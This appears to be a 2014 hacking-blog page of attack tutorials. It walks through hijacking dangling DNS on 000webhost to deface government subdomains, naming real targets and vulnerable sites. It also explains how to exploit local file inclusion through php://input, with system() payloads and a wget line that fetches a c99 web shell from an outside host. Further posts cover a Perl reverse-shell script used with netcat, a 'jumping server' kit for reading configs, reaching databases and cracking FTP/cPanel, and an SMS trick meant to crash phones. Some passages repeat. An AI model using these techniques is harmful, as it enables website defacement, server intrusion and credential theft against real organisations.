Thursday, 13 March 2014
Labels:
Tutorials
So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.
Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com
Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"
Now Goto Bing .com and type dork ip:31.170.163.140
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253
Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253
Server 3 with 242 ips
31.170.163.1 - 31.170.163.241
Read More
000webhost DNS Hijacking Vulnerablity
So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.
Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com
Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"
Now Goto Bing .com and type dork ip:31.170.163.140
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253
Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253
Server 3 with 242 ips
31.170.163.1 - 31.170.163.241
Now come to Search Results
i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost.
which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd
and done added a deface page to my public_html
and the website defaced .
Some of the sites for example which are vulnreable for this attack
i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost.
which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd
and done added a deface page to my public_html
and the website defaced .
Some of the sites for example which are vulnreable for this attack
http://test.fraymamertoesquiu.gov.ar
http://test.concejodeitagui.gov.co
http://dns.hviota.gov.co
http://test.digitizeyou.in
http://men.csirt.gov.bd
http://bd.csirt.gov.bd
Labels:
Tutorials
Read More
LFI EXPLOITATION VIA PHP://input
Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.
So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.
First things first, give it a shot and see if you can read "/etc/passwd"
URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be having a page that looks like this:
 |
Now lets try reading:
Code:
/proc/self/environ/proc/self/fd
So URL will become:
Code:
http://www.site.com/index.php?page=/proc/self/environhttp://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
|
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
|
Now let's try putting this method in action.
Look at the picture carefully.
|
URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
This is how it's gonna look like.
|
Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
Wednesday, 12 March 2014
Labels:
Tutorials
Read More
Shell Backconnect Perl Script
Shell Backconnect Perl Script
Download Link : Click Here ..!!!
Usage: perl bc.pl [Host] [Port]Example : perl bc.pl computer-real-ip port Method : Open netcat type nc -nlvp 444 Hit Enter Button now goto Shelled site Execute Command Chmod +x bc.pl then execute command perl bc.pl pc-ip port
Tuesday, 11 March 2014
Labels:
Tutorials
Read More
Jumping Server Full Tutorial
REQUIREMENTS:
AN SHELLED WEBSITE
JUMPING SERVER FILES. WHICH YOU CAN DOWNLOAD HERE
Mediafire Link : http://www.mediafire.com/?bjs5530pl3p80nz
STEP TO HACK WITH JUMPING SERVER:
1. Go to your shell and upload zip file - jumping.php to your shell
2. Now Unzip jumping.php by this command - unzip jumping.zip
3. If you had commanded correctly then it will look like this
4.After successfully unziping it ,Now if you had uploded jumping.php in public_html then you can go here http://www.site.com/jumping or if you upload in other then specify it in URL
After Opening this URL you will see like this
5.You will see an file name barcode mini.php just after the Parent Directory as you can see in the image above. Click On It after it is open you will see page like this
Note : Just near the Apache Server at Port 80 you will see white blank so click on it and just enter the password
Password – hackers
6.After this now open jump.php and wait till it scans for all readable sites on server.
Once it is done you will see page like this
7.All the above are directly readable. Now will run scanner.php it will read for config file in those dir once done it shows us like this
8.Now lets take one of them and put it in our barcode mini.php and see if it allow us to see database
9.And if you will get access to the database then it will be seen like this
10.This also have included two more files sql.php & domain.php. this will help you to get website name and get in to database..cracker.php tries to crack ftp+ cpanel… Updated barcode.php This shell is the newer version of barcode mini.php it is all in one shell. it has jump, scanner, cracker, and checker included in one shell
Download barcode.php here -http://www.mediafire.com/?z5x7rf167rtv5ek
Labels:
Tricks
Read More
Switching Off Mobile Phone Through SMS
In this Post i will tell you an awesome trick to switch off your friend mobile phone through a simple trick. It is a very funny trick hope you will like it.
So Follow my Steps...
(1) Us Multimedia phone for this Trick because multimedia phone is not effected by this tick and other simple phone are effected.
(2) Then open Menu >> Message >> Write new message
(3) Type 51 commas(for some of the phones or phone OS versions you need to use 79 commas instead of 51) [ ' ] like below(These are inverted commas)
You can add you own comment at the start of this message like "Hy! I am going to Switch Off your Mobile Phone"
Subscribe to:
Posts
(
Atom
)
